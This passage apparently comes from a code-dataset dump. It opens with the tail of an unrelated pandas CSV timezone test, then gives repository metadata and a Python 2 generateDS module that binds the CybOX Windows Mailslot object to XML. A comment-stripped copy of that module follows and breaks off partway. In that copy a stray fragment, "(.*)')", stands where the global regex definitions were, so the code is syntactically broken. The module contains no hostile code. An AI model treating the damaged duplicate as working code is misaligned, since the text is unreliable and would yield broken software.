2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
    result = parser.read_csv(StringIO(data), parse_dates=["dt"])
    dti = pd.date_range(start="2018-01-04 09:01:00",
                        end="2018-01-04 09:05:00", freq="1min",
                        tz=pytz.FixedOffset(540))
    expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
    expected = DataFrame(expected_data)
    tm.assert_frame_equal(result, expected)
| true
| true
|
f71904faf2288daafe85d61933530d6aa3302b20
| 22,091
|
py
|
Python
|
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | 1
|
2015-11-08T16:06:03.000Z
|
2015-11-08T16:06:03.000Z
|
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/cybox_to_oval/cybox/win_mailslot_object_1_1.py
|
AAG-SATIEDN/Tools
|
1119af9c6a498c32690d4f3cc2310565112bca76
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Apr 10 13:54:57 2012 by generateDS.py version 2.7b.
#
import sys
import getopt
import re as re_
import common_types_1_0 as common
import win_handle_object_1_2 as win_handle_object
# Runtime XML-library selection: try lxml first, then the historical
# ElementTree spellings; etree_ ends up bound to whichever imported,
# and XMLParser_import_library records which family was found.
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
  XMLParser_import_elementtree
  ) = range(3)
XMLParser_import_library = None
try:
    # lxml
    from lxml import etree as etree_
    XMLParser_import_library = XMLParser_import_lxml
    if Verbose_import_:
        print("running with lxml.etree")
except ImportError:
    try:
        # cElementTree from Python 2.5+
        import xml.etree.cElementTree as etree_
        XMLParser_import_library = XMLParser_import_elementtree
        if Verbose_import_:
            print("running with cElementTree on Python 2.5+")
    except ImportError:
        try:
            # ElementTree from Python 2.5+
            import xml.etree.ElementTree as etree_
            XMLParser_import_library = XMLParser_import_elementtree
            if Verbose_import_:
                print("running with ElementTree on Python 2.5+")
        except ImportError:
            try:
                # normal cElementTree install
                import cElementTree as etree_
                XMLParser_import_library = XMLParser_import_elementtree
                if Verbose_import_:
                    print("running with cElementTree")
            except ImportError:
                try:
                    # normal ElementTree install
                    import elementtree.ElementTree as etree_
                    XMLParser_import_library = XMLParser_import_elementtree
                    if Verbose_import_:
                        print("running with ElementTree")
                except ImportError:
                    raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
    """Parse an XML document using whichever etree flavor was imported.

    Accepts the same arguments as ``etree.parse`` and returns the
    resulting document tree.
    """
    if (XMLParser_import_library == XMLParser_import_lxml and
        'parser' not in kwargs):
        # Use the lxml ElementTree compatible parser so that, e.g.,
        # we ignore comments.
        kwargs['parser'] = etree_.ETCompatXMLParser()
    doc = etree_.parse(*args, **kwargs)
    return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
    from generatedssuper import GeneratedsSuper
except ImportError, exp:
    # Fallback base class, used when the user has not supplied their own
    # generatedssuper module.  Provides format/validate hooks for the
    # simple XSD value types plus a few element-tree helpers.
    # NOTE: this module is Python 2 (``except X, e`` syntax throughout).
    class GeneratedsSuper(object):
        def gds_format_string(self, input_data, input_name=''):
            return input_data
        def gds_validate_string(self, input_data, node, input_name=''):
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            return '%d' % input_data
        def gds_validate_integer(self, input_data, node, input_name=''):
            return input_data
        def gds_format_integer_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_integer_list(self, input_data, node, input_name=''):
            # Validate by attempting float() on each token; reports via
            # raise_parse_error but returns the original string.
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError), exp:
                    raise_parse_error(node, 'Requires sequence of integers')
            return input_data
        def gds_format_float(self, input_data, input_name=''):
            return '%f' % input_data
        def gds_validate_float(self, input_data, node, input_name=''):
            return input_data
        def gds_format_float_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_float_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError), exp:
                    raise_parse_error(node, 'Requires sequence of floats')
            return input_data
        def gds_format_double(self, input_data, input_name=''):
            return '%e' % input_data
        def gds_validate_double(self, input_data, node, input_name=''):
            return input_data
        def gds_format_double_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_double_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError), exp:
                    raise_parse_error(node, 'Requires sequence of doubles')
            return input_data
        def gds_format_boolean(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_boolean(self, input_data, node, input_name=''):
            return input_data
        def gds_format_boolean_list(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_validate_boolean_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                if value not in ('true', '1', 'false', '0', ):
                    raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
            return input_data
        def gds_str_lower(self, instring):
            return instring.lower()
        def get_path_(self, node):
            # Build an XPath-like '/'-joined path from root to node.
            path_list = []
            self.get_path_list_(node, path_list)
            path_list.reverse()
            path = '/'.join(path_list)
            return path
        Tag_strip_pattern_ = re_.compile(r'\{.*\}')
        def get_path_list_(self, node, path_list):
            # Walks ancestors via getparent(), which is lxml-specific.
            if node is None:
                return
            tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
            if tag:
                path_list.append(tag)
            self.get_path_list_(node.getparent(), path_list)
        def get_class_obj_(self, node, default_class=None):
            # Resolve an xsi:type attribute to a generated class in this
            # module's globals; fall back to default_class.
            class_obj1 = default_class
            if 'xsi' in node.nsmap:
                classname = node.get('{%s}type' % node.nsmap['xsi'])
                if classname is not None:
                    names = classname.split(':')
                    if len(names) == 2:
                        classname = names[1]
                    class_obj2 = globals().get(classname)
                    if class_obj2 is not None:
                        class_obj1 = class_obj2
            return class_obj1
        def gds_build_any(self, node, type_name=None):
            return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'  # encoding used when exporting text content
Tag_pattern_ = re_.compile(r'({.*})?(.*)')  # splits optional '{ns}' from tag
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")  # runs of whitespace
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')  # captures ns and local name
#
# Support/utility functions.
#
def showIndent(outfile, level):
    """Write four spaces of indentation per *level* to *outfile*."""
    outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape &, < and > in *inStr* for use as XML element content.

    Falsy input yields ''.  Non-string input is stringified first
    (``basestring`` — this generated module is Python 2).

    Bug fix: the entity replacements had been mangled into no-ops
    (e.g. ``replace('&', '&')``); restore the proper XML entities.
    """
    if not inStr:
        return ''
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* and wrap it in quotes for use as an XML attribute.

    Prefers double quotes; falls back to single quotes when the value
    contains a double quote, and to ``&quot;`` entities when it contains
    both.  (``basestring`` — this generated module is Python 2.)

    Bug fix: the entity replacements had been mangled into no-ops
    (e.g. ``replace('&', '&')``); restore the proper XML entities.
    """
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Return *inStr* rendered as a quoted Python string literal.

    Single-quotes when possible, double-quotes (escaping embedded double
    quotes) when the text contains a single quote, and triple-quotes
    multiline text.
    """
    text = inStr
    if "'" not in text:
        template = "'%s'" if text.find('\n') == -1 else "'''%s'''"
        return template % text
    if '"' in text:
        text = text.replace('"', '\\"')
    template = '"%s"' if text.find('\n') == -1 else '"""%s"""'
    return template % text
def get_all_text_(node):
    """Collect *node*'s direct text plus the tail text of every child.

    This yields the element's full mixed-content character data in
    document order.
    """
    pieces = []
    if node.text is not None:
        pieces.append(node.text)
    for child in node:
        if child.tail is not None:
            pieces.append(child.tail)
    return ''.join(pieces)
def find_attr_value_(attr_name, node):
    """Look up attribute *attr_name* on *node*, resolving a
    'prefix:name' spelling through the node's namespace map.

    Returns None when the attribute is absent or the prefix is unknown.
    """
    attrs = node.attrib
    attr_parts = attr_name.split(':')
    value = None
    if len(attr_parts) == 1:
        # Unprefixed attribute: direct lookup.
        value = attrs.get(attr_name)
    elif len(attr_parts) == 2:
        prefix, name = attr_parts
        namespace = node.nsmap.get(prefix)  # NOTE: nsmap is lxml-specific
        if namespace is not None:
            value = attrs.get('{%s}%s' % (namespace, name, ))
    return value
class GDSParseError(Exception):
    """Raised when XML content cannot be parsed into the generated model."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError for *node*, appending element (and, under
    lxml, source line) context to *msg*."""
    if XMLParser_import_library == XMLParser_import_lxml:
        # lxml elements carry their source line; plain ElementTree does not.
        msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
    else:
        msg = '%s (element %s)' % (msg, node.tag, )
    raise GDSParseError(msg)
class MixedContainer:
    """Holds one piece of mixed XML content: raw text, a simple typed
    value, or a nested complex object, tagged with category/content_type
    so export code can serialize it appropriately."""
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7
    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value
    def getCategory(self):
        return self.category
    def getContenttype(self, content_type):
        return self.content_type
    def getValue(self):
        return self.value
    def getName(self):
        return self.name
    def export(self, outfile, level, name, namespace):
        # Serialize this item as XML according to its category.
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace,name)
    def exportSimple(self, outfile, level, name):
        # Write <name>value</name> using a %-format chosen by type.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
    def exportLiteral(self, outfile, level, name):
        # Emit Python-source (literal) form, used by generateDS's
        # exportLiteral feature.
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
                (self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
                (self.category, self.content_type, self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
                (self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Describes one member of a generated class: its name, its data
    type (a scalar or a chain of types), and a container flag."""
    def __init__(self, name='', data_type='', container=0):
        self.name = name
        self.data_type = data_type
        self.container = container
    def set_name(self, name):
        self.name = name
    def get_name(self):
        return self.name
    def set_data_type(self, data_type):
        self.data_type = data_type
    def get_data_type_chain(self):
        return self.data_type
    def get_data_type(self):
        """Effective type: last element of a chain, the scalar itself,
        or 'xs:string' for an empty chain."""
        chain = self.data_type
        if not isinstance(chain, list):
            return chain
        return chain[-1] if chain else 'xs:string'
    def set_container(self, container):
        self.container = container
    def get_container(self):
        return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class WindowsMailslotObjectType(common.DefinedObjectType):
    """The WindowsMailslotObjectType is intended to characterize Windows
    mailslot objects."""
    # Generated binding (generateDS style): factory plus get/set accessors,
    # XML export (export*), Python-literal export (exportLiteral*), and
    # construction from a parsed element tree (build*).
    subclass = None
    superclass = common.DefinedObjectType
    def __init__(self, Handle=None, Max_Message_Size=None, Name=None, Read_Timeout=None, Security_Attributes=None):
        super(WindowsMailslotObjectType, self).__init__(None)
        self.Handle = Handle
        self.Max_Message_Size = Max_Message_Size
        self.Name = Name
        self.Read_Timeout = Read_Timeout
        self.Security_Attributes = Security_Attributes
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed,
        # otherwise this class itself.
        if WindowsMailslotObjectType.subclass:
            return WindowsMailslotObjectType.subclass(*args_, **kwargs_)
        else:
            return WindowsMailslotObjectType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for the five mailslot fields.
    def get_Handle(self): return self.Handle
    def set_Handle(self, Handle): self.Handle = Handle
    def get_Max_Message_Size(self): return self.Max_Message_Size
    def set_Max_Message_Size(self, Max_Message_Size): self.Max_Message_Size = Max_Message_Size
    def get_Name(self): return self.Name
    def set_Name(self, Name): self.Name = Name
    def get_Read_Timeout(self): return self.Read_Timeout
    def set_Read_Timeout(self, Read_Timeout): self.Read_Timeout = Read_Timeout
    def get_Security_Attributes(self): return self.Security_Attributes
    def set_Security_Attributes(self, Security_Attributes): self.Security_Attributes = Security_Attributes
    def export(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', namespacedef_=''):
        # Write this object as an XML element; self-closing when empty.
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType'):
        # Attributes come solely from the base class; none are added here.
        super(WindowsMailslotObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='WindowsMailslotObjectType')
    def exportChildren(self, outfile, level, namespace_='WinMailslotObj:', name_='WindowsMailslotObjectType', fromsubclass_=False):
        # Each non-None field becomes one child element, in schema order.
        # NOTE(review): fields are exported via .export(), but buildChildren
        # stores plain strings -- round-tripping a parsed object would fail;
        # confirm expected field types with upstream usage.
        if self.Handle is not None:
            self.Handle.export(outfile, level, 'WinMailslotObj:', name_='Handle')
        if self.Max_Message_Size is not None:
            self.Max_Message_Size.export(outfile, level, 'WinMailslotObj:', name_='Max_Message_Size')
        if self.Name is not None:
            self.Name.export(outfile, level, 'WinMailslotObj:', name_='Name')
        if self.Read_Timeout is not None:
            self.Read_Timeout.export(outfile, level, 'WinMailslotObj:', name_='Read_Timeout')
        if self.Security_Attributes is not None:
            self.Security_Attributes.export(outfile, level, 'WinMailslotObj:', name_='Security_Attributes')
    def hasContent_(self):
        # True when at least one child field is populated.
        if (
            self.Handle is not None or
            self.Max_Message_Size is not None or
            self.Name is not None or
            self.Read_Timeout is not None or
            self.Security_Attributes is not None
            ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='WindowsMailslotObjectType'):
        # Emit this object as a Python constructor literal.
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No attributes of its own to emit.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        # One keyword-argument line per populated field.
        if self.Handle is not None:
            showIndent(outfile, level)
            outfile.write('Handle=%s,\n' % quote_python(self.Handle).encode(ExternalEncoding))
        if self.Max_Message_Size is not None:
            showIndent(outfile, level)
            outfile.write('Max_Message_Size=%s,\n' % quote_python(self.Max_Message_Size).encode(ExternalEncoding))
        if self.Name is not None:
            showIndent(outfile, level)
            outfile.write('Name=%s,\n' % quote_python(self.Name).encode(ExternalEncoding))
        if self.Read_Timeout is not None:
            showIndent(outfile, level)
            outfile.write('Read_Timeout=%s,\n' % quote_python(self.Read_Timeout).encode(ExternalEncoding))
        if self.Security_Attributes is not None:
            showIndent(outfile, level)
            outfile.write('Security_Attributes=%s,\n' % quote_python(self.Security_Attributes).encode(ExternalEncoding))
    def build(self, node):
        # Populate this object from an element-tree node.
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes of its own to read.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Store each recognized child element's text as a validated string,
        # then let the base class handle anything it defines.
        if nodeName_ == 'Handle':
            Handle_ = child_.text
            Handle_ = self.gds_validate_string(Handle_, node, 'Handle')
            self.Handle = Handle_
        elif nodeName_ == 'Max_Message_Size':
            Max_Message_Size_ = child_.text
            Max_Message_Size_ = self.gds_validate_string(Max_Message_Size_, node, 'Max_Message_Size')
            self.Max_Message_Size = Max_Message_Size_
        elif nodeName_ == 'Name':
            Name_ = child_.text
            Name_ = self.gds_validate_string(Name_, node, 'Name')
            self.Name = Name_
        elif nodeName_ == 'Read_Timeout':
            Read_Timeout_ = child_.text
            Read_Timeout_ = self.gds_validate_string(Read_Timeout_, node, 'Read_Timeout')
            self.Read_Timeout = Read_Timeout_
        elif nodeName_ == 'Security_Attributes':
            Security_Attributes_ = child_.text
            Security_Attributes_ = self.gds_validate_string(Security_Attributes_, node, 'Security_Attributes')
            self.Security_Attributes = Security_Attributes_
        super(WindowsMailslotObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class WindowsMailslotObjectType
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
    # Print the command-line help text and exit with a non-zero status.
    # NOTE: Python 2 print statement -- this module is Python 2 only.
    print USAGE_TEXT
    sys.exit(1)
def get_root_tag(node):
    # Strip any namespace prefix from the element tag and look up a
    # generated class of the same name in this module's globals.
    tag = Tag_pattern_.match(node.tag).groups()[-1]
    rootClass = globals().get(tag)
    # rootClass is None when no generated class matches the tag name.
    return tag, rootClass
def parse(inFileName):
    """Parse the XML file *inFileName*, build the generated object tree,
    echo it to stdout as XML, and return the root object."""
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: fall back to the default object type.
        rootTag = 'Windows_Mailslot'
        rootClass = WindowsMailslotObjectType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('<?xml version="1.0" ?>\n')
    rootObj.export(sys.stdout, 0, name_=rootTag,
        namespacedef_='')
    return rootObj
def parseString(inString):
    """Parse XML from the string *inString*; otherwise behaves like parse()."""
    # StringIO module is Python 2 only (moved to io.StringIO in Python 3).
    from StringIO import StringIO
    doc = parsexml_(StringIO(inString))
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        rootTag = 'Windows_Mailslot'
        rootClass = WindowsMailslotObjectType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('<?xml version="1.0" ?>\n')
    # NOTE(review): unlike parse(), this always exports under the fixed tag
    # "Windows_Mailslot" instead of rootTag -- looks like a generator quirk;
    # confirm before relying on the echoed root tag.
    rootObj.export(sys.stdout, 0, name_="Windows_Mailslot",
        namespacedef_='')
    return rootObj
def parseLiteral(inFileName):
    """Parse the XML file *inFileName* and echo the object tree to stdout as
    a Python-literal reconstruction script; return the root object."""
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root tag: fall back to the default object type.
        rootTag = 'Windows_Mailslot'
        rootClass = WindowsMailslotObjectType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    sys.stdout.write('#from Win_Mailslot_Object import *\n\n')
    sys.stdout.write('import Win_Mailslot_Object as model_\n\n')
    sys.stdout.write('rootObj = model_.rootTag(\n')
    rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
    sys.stdout.write(')\n')
    return rootObj
def main():
    """Entry point: parse the single XML file named on the command line,
    or print usage (which exits) when the argument count is wrong."""
    args = sys.argv[1:]
    if len(args) != 1:
        usage()
    else:
        parse(args[0])
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"WindowsMailslotObjectType"
]
| 38.486063
| 145
| 0.626499
|
import sys
import getopt
import re as re_
import common_types_1_0 as common
import win_handle_object_1_2 as win_handle_object
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError("Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
    """Parse XML via the selected ElementTree backend; when the lxml
    backend is active, use its compatibility parser unless the caller
    supplied a parser of their own."""
    if (XMLParser_import_library == XMLParser_import_lxml and
        'parser' not in kwargs):
        kwargs['parser'] = etree_.ETCompatXMLParser()
    doc = etree_.parse(*args, **kwargs)
    return doc
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node, 'Requires sequence of booleans ("true", "1", "false", "0")')
return input_data
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
(.*)')
def showIndent(outfile, level):
    """Write one space of indentation per nesting *level* to *outfile*."""
    outfile.write(' ' * level)
def quote_xml(inStr):
    """Escape &, < and > in *inStr* for use as XML text content.

    Falsy input (None, '') yields the empty string; non-string input is
    first converted with '%s' formatting.
    """
    if not inStr:
        return ''
    # basestring is Python 2 only -- this module targets Python 2.
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    # '&' is escaped first so the entities below are not double-escaped.
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* for use as an XML attribute value and return it
    wrapped in the appropriate quote characters."""
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            # Both quote kinds present: escape double quotes, delimit with them.
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            # Only double quotes present: delimit with single quotes instead.
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Return *inStr* rendered as a Python string literal, choosing the
    quote style (and triple-quoting for multi-line text) so the content
    needs no further escaping."""
    text = inStr
    has_newline = '\n' in text
    if "'" not in text:
        # No single quotes in the text: single-quote delimiters are safe.
        return ("'''%s'''" if has_newline else "'%s'") % text
    # Fall back to double-quote delimiters, escaping embedded double quotes.
    if '"' in text:
        text = text.replace('"', '\\"')
    return ('"""%s"""' if has_newline else '"%s"') % text
def get_all_text_(node):
    """Collect the node's direct text: its leading text plus every child's
    tail text, skipping None values (child element text is excluded)."""
    pieces = [node.text if node.text is not None else '']
    pieces.extend(child.tail for child in node if child.tail is not None)
    return ''.join(pieces)
def find_attr_value_(attr_name, node):
    """Look up attribute *attr_name* on *node*.

    A plain name is looked up directly; a ``prefix:name`` form is resolved
    through the node's namespace map (lxml nodes only). Returns None when
    the attribute is absent or the name cannot be resolved.
    """
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, local = parts
        uri = node.nsmap.get(prefix)
        if uri is not None:
            return attrs.get('{%s}%s' % (uri, local))
    # More than two parts, or an unresolvable prefix: no match.
    return None
class GDSParseError(Exception):
    """Raised when XML input cannot be parsed into the generated model."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError for *node*, appending the element tag and -- when
    the lxml backend (which tracks source lines) is active -- the line number."""
    if XMLParser_import_library == XMLParser_import_lxml:
        detail = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
    else:
        detail = '%s (element %s)' % (msg, node.tag, )
    raise GDSParseError(detail)
class MixedContainer:
    """Holder for one piece of mixed XML content (raw text, a simple typed
    value, or a nested complex object), tagged with category/content type."""
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7
    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value
    def getCategory(self):
        return self.category
    def getContenttype(self, content_type):
        # NOTE(review): the content_type parameter is accepted but unused;
        # kept as-is for signature compatibility with existing callers.
        return self.content_type
    def getValue(self):
        return self.value
    def getName(self):
        return self.name
    def export(self, outfile, level, name, namespace):
        # Dispatch on category: raw text, simple value, or nested object.
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
